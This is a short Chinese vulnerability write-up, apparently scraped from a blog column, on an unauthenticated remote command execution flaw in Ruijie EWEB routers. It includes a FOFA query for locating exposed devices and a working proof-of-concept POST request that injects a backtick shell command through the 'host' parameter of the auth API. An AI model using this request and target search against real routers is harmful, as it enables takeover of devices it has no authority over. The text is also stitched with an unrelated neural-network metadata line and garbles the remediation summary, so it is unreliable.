超级会员免费看
本文介绍了锐捷EWEB路由器存在的一个严重安全问题,即auth接口在未验证身份时可执行任意命令,可能导致服务器权限被获取。影响设备数量约为55,755个。修复该漏洞的方法包括访问特定路径以复现问题,并通过更新官方补丁进行升级。"
132807568,19673271,和声搜索优化模糊神经网络在负荷预测中的应用,"['神经网络', '算法', 'Matlab', '模糊系统', '电力系统']
产品简介
锐捷网络EWEB路由器是锐捷网络股份有限公司的一款无线路由设备。
漏洞描述
锐捷EWEB路由器auth接口可在身份未验证的情况下执行任意命令,可以获取服务器权限,存在远程命令执行漏洞。
fofa
body=”cgi-bin/luci” && body=”#f47f3e”
影响数量55,755个
漏洞复现
POST /cgi-bin/luci/api/auth HTTP/1.1
Host:
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 73
{"method":"checkNet","params":{"host":"`echo qqwweerrqqq>qqwweerr.txt`"}}
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
